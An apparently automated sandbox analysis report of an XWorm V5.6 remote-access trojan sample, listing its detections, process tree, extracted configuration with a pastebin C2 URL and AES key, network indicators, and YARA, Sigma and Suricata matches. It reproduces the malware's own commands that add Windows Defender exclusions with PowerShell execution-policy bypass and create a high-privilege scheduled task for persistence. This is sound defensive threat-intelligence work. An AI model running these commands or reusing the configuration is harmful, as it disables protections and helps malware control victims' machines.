Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1574873
MD5:	0ea332e21336ff3e93e5713b6cf0a74f
SHA1:	307253c29cb74ade88684f45b8fe10fc05bcf202
SHA256:	3663d60f0c8125e46f3f4efb108d21fea6065f8c636e770d7efb26e66c2529a9
Tags:	NETexeMSILuser-jstrosch
Infos:

Detection

XWorm

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected UAC Bypass using CMSTP

Yara detected XWorm

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Bypasses PowerShell execution policy

C2 URLs / IPs found in malware configuration

Connects to a pastebin service (likely for C&C)

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Protects its processes via BreakOnTermination flag

Sample uses string decryption to hide its real strings

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Uses schtasks.exe or at.exe to add and modify task schedules

Yara detected Generic Downloader

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Contains long sleeps (>= 3 min)

Creates COM task schedule object (often to register a task for autostart)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Drops PE files to the program root directory (C:\Program Files)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Schtasks From Env Var Folder

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

file.exe (PID: 2432 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 0EA332E21336FF3E93E5713B6CF0A74F)

powershell.exe (PID: 7388 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Program Files\msedge.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7676 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

msedge.exe (PID: 8020 cmdline: "C:\Program Files\msedge.exe" MD5: 0EA332E21336FF3E93E5713B6CF0A74F)

msedge.exe (PID: 8072 cmdline: "C:\Program Files\msedge.exe" MD5: 0EA332E21336FF3E93E5713B6CF0A74F)

schtasks.exe (PID: 8140 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Runtime Broken Core" /tr "C:\Users\user\AppData\Roaming\Runtime Broken Core.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

conhost.exe (PID: 8148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Runtime Broken Core.exe (PID: 1648 cmdline: "C:\Users\user\AppData\Roaming\Runtime Broken Core.exe" MD5: 0EA332E21336FF3E93E5713B6CF0A74F)

Runtime Broken Core.exe (PID: 7196 cmdline: "C:\Users\user\AppData\Roaming\Runtime Broken Core.exe" MD5: 0EA332E21336FF3E93E5713B6CF0A74F)

Runtime Broken Core.exe (PID: 7496 cmdline: "C:\Users\user\AppData\Roaming\Runtime Broken Core.exe" MD5: 0EA332E21336FF3E93E5713B6CF0A74F)

Runtime Broken Core.exe (PID: 1624 cmdline: "C:\Users\user\AppData\Roaming\Runtime Broken Core.exe" MD5: 0EA332E21336FF3E93E5713B6CF0A74F)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
XWorm	Malware with wide range of capabilities ranging from RAT to ransomware.	No Attribution	https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ https://cert.pl/en/posts/2023/10/deworming-the-xworm/ https://embee-research.ghost.io/infrastructure-analysis-with-dns-pivoting/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["https://pastebin.com/raw/BE5x0K3q"], "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
file.exe	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Program Files\msedge.exe	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000012.00000002.2551372869.0000000001520000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000012.00000002.2551372869.0000000001520000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x72ef:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x738c:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x74a1:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x712b:$cnc4: POST / HTTP/1.1
00000005.00000002.1564147086.0000000012781000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000005.00000000.1275494470.0000000000282000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000012.00000002.2552140840.0000000003091000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000012.00000002.2552140840.0000000003091000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x127af:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x1aa54:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x1284c:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x1ab0c:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x12961:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x1ac3c:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x125eb:$cnc4: POST / HTTP/1.1
Process Memory Space: file.exe PID: 2432	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: msedge.exe PID: 8072	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
18.2.msedge.exe.1520000.0.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
18.2.msedge.exe.1520000.0.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x72ef:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x738c:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x74a1:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x712b:$cnc4: POST / HTTP/1.1
18.2.msedge.exe.1520000.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
18.2.msedge.exe.1520000.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x54ef:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x558c:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x56a1:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x532b:$cnc4: POST / HTTP/1.1
18.2.msedge.exe.309c4c0.1.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
18.2.msedge.exe.309c4c0.1.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x54ef:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x558c:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x56a1:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x532b:$cnc4: POST / HTTP/1.1
5.2.file.exe.12781a78.0.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
5.0.file.exe.280000.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
5.2.file.exe.12781a78.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
18.2.msedge.exe.309c4c0.1.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
18.2.msedge.exe.309c4c0.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
18.2.msedge.exe.309c4c0.1.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x72ef:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xf594:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x738c:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xf64c:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x74a1:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xf77c:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x712b:$cnc4: POST / HTTP/1.1
Click to see the 7 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Program Files\msedge.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Program Files\msedge.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 2432, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Program Files\msedge.exe', ProcessId: 7388, ProcessName: powershell.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Program Files\msedge.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Program Files\msedge.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 2432, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Program Files\msedge.exe', ProcessId: 7388, ProcessName: powershell.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe, EventID: 13, EventType: SetValue, Image: C:\Program Files\msedge.exe, ProcessId: 8072, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Runtime Broken Core

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Runtime Broken Core" /tr "C:\Users\user\AppData\Roaming\Runtime Broken Core.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Runtime Broken Core" /tr "C:\Users\user\AppData\Roaming\Runtime Broken Core.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Program Files\msedge.exe", ParentImage: C:\Program Files\msedge.exe, ParentProcessId: 8072, ParentProcessName: msedge.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Runtime Broken Core" /tr "C:\Users\user\AppData\Roaming\Runtime Broken Core.exe", ProcessId: 8140, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Program Files\msedge.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Program Files\msedge.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 2432, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Program Files\msedge.exe', ProcessId: 7388, ProcessName: powershell.exe

Suricata Signatures

ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-13T17:58:39.261340+0100	2855924	1	Malware Command and Control Activity Detected	192.168.2.7	49765	147.185.221.24	19999	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Avira: detection malicious, Label: HEUR/AGEN.1305763
Source: C:\Program Files\msedge.exe	Avira: detection malicious, Label: HEUR/AGEN.1305763

Found malware configuration

Source: 00000012.00000002.2552140840.0000000003091000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Xworm {"C2 url": ["https://pastebin.com/raw/BE5x0K3q"], "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Multi AV Scanner detection for dropped file

Source: C:\Program Files\msedge.exe	ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	ReversingLabs: Detection: 81%

Multi AV Scanner detection for submitted file

Source: file.exe

ReversingLabs: Detection: 81%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Joe Sandbox ML: detected
Source: C:\Program Files\msedge.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 18.2.msedge.exe.309c4c0.1.raw.unpack	String decryptor: https://pastebin.com/raw/BE5x0K3q
Source: 18.2.msedge.exe.309c4c0.1.raw.unpack	String decryptor: <123456789>
Source: 18.2.msedge.exe.309c4c0.1.raw.unpack	String decryptor: <Xwormmm>
Source: 18.2.msedge.exe.309c4c0.1.raw.unpack	String decryptor: XWorm V5.6
Source: 18.2.msedge.exe.309c4c0.1.raw.unpack	String decryptor: USB.exe
Source: 18.2.msedge.exe.309c4c0.1.raw.unpack	String decryptor: %AppData%
Source: 18.2.msedge.exe.309c4c0.1.raw.unpack	String decryptor: Runtime Broken Core.exe

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: file.exe, type: SAMPLE
Source: Yara match	File source: 5.2.file.exe.12781a78.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.file.exe.280000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.file.exe.12781a78.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.1564147086.0000000012781000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.1275494470.0000000000282000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 2432, type: MEMORYSTR
Source: Yara match	File source: C:\Program Files\msedge.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe, type: DROPPED

Source: C:\Users\user\Desktop\file.exe

Directory created: C:\Program Files\msedge.exe

Jump to behavior

Source: unknown

HTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.7:49756 version: TLS 1.2

Source: file.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.7:49765 -> 147.185.221.24:19999

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://pastebin.com/raw/BE5x0K3q

Connects to a pastebin service (likely for C&C)

Source: unknown

DNS query: name: pastebin.com

Yara detected Generic Downloader

Source: Yara match

File source: 18.2.msedge.exe.309c4c0.1.raw.unpack, type: UNPACKEDPE

Source: global traffic

TCP traffic: 192.168.2.7:49765 -> 147.185.221.24:19999

Source: global traffic

HTTP traffic detected: GET /raw/BE5x0K3q HTTP/1.1Host: pastebin.comConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 172.67.19.24 172.67.19.24
Source: Joe Sandbox View	IP Address: 172.67.19.24 172.67.19.24
Source: Joe Sandbox View	IP Address: 147.185.221.24 147.185.221.24

Source: Joe Sandbox View

ASN Name: SALSGIVERUS SALSGIVERUS

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /raw/BE5x0K3q HTTP/1.1Host: pastebin.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: pastebin.com
Source: global traffic	DNS traffic detected: DNS query: flash-mathematical.gl.at.ply.gg

Source: powershell.exe, 0000000A.00000002.1357401180.00000298A3520000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.m~
Source: msedge.exe, 00000012.00000002.2571506623.000000001BA81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.v
Source: powershell.exe, 0000000A.00000002.1350861462.000002989AE94000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1476995740.000001D823A04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000E.00000002.1400754417.000001D813BB8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000A.00000002.1319587640.000002988B049000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1400754417.000001D813BB8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: file.exe, 00000005.00000002.1563163174.0000000002771000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1319587640.000002988AE21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1400754417.000001D813991000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000012.00000002.2552140840.0000000003091000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000A.00000002.1319587640.000002988B049000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1400754417.000001D813BB8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000E.00000002.1400754417.000001D813BB8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000E.00000002.1503638079.000001D82C19D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 0000000E.00000002.1502352208.000001D82C0B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://.509.1.1
Source: powershell.exe, 0000000A.00000002.1319587640.000002988AE21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1400754417.000001D813991000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000000E.00000002.1476995740.000001D823A04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000E.00000002.1476995740.000001D823A04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000E.00000002.1476995740.000001D823A04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000E.00000002.1400754417.000001D813BB8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000A.00000002.1350861462.000002989AE94000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1476995740.000001D823A04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: msedge.exe, 00000012.00000002.2552140840.0000000003091000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com
Source: msedge.exe, 00000012.00000002.2552140840.0000000003091000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/BE5x0K3q

Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756

Source: unknown

HTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.7:49756 version: TLS 1.2

Operating System Destruction

Protects its processes via BreakOnTermination flag

Source: C:\Program Files\msedge.exe

Process information set: 01 00 00 00

Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: 18.2.msedge.exe.1520000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 18.2.msedge.exe.1520000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 18.2.msedge.exe.309c4c0.1.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 18.2.msedge.exe.309c4c0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000012.00000002.2551372869.0000000001520000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000012.00000002.2552140840.0000000003091000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen

Source: C:\Users\user\Desktop\file.exe	Code function: 5_2_00007FFAAC636922	5_2_00007FFAAC636922
Source: C:\Users\user\Desktop\file.exe	Code function: 5_2_00007FFAAC630EFA	5_2_00007FFAAC630EFA
Source: C:\Users\user\Desktop\file.exe	Code function: 5_2_00007FFAAC635B76	5_2_00007FFAAC635B76
Source: C:\Users\user\Desktop\file.exe	Code function: 5_2_00007FFAAC630F68	5_2_00007FFAAC630F68
Source: C:\Program Files\msedge.exe	Code function: 17_2_00007FFAAC630EFA	17_2_00007FFAAC630EFA
Source: C:\Program Files\msedge.exe	Code function: 17_2_00007FFAAC630F68	17_2_00007FFAAC630F68
Source: C:\Program Files\msedge.exe	Code function: 18_2_00007FFAAC629CE6	18_2_00007FFAAC629CE6
Source: C:\Program Files\msedge.exe	Code function: 18_2_00007FFAAC62AA92	18_2_00007FFAAC62AA92
Source: C:\Program Files\msedge.exe	Code function: 18_2_00007FFAAC620EFA	18_2_00007FFAAC620EFA
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Code function: 21_2_00007FFAAC610EFA	21_2_00007FFAAC610EFA
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Code function: 21_2_00007FFAAC610F68	21_2_00007FFAAC610F68
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Code function: 22_2_00007FFAAC630EFA	22_2_00007FFAAC630EFA
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Code function: 22_2_00007FFAAC630F68	22_2_00007FFAAC630F68
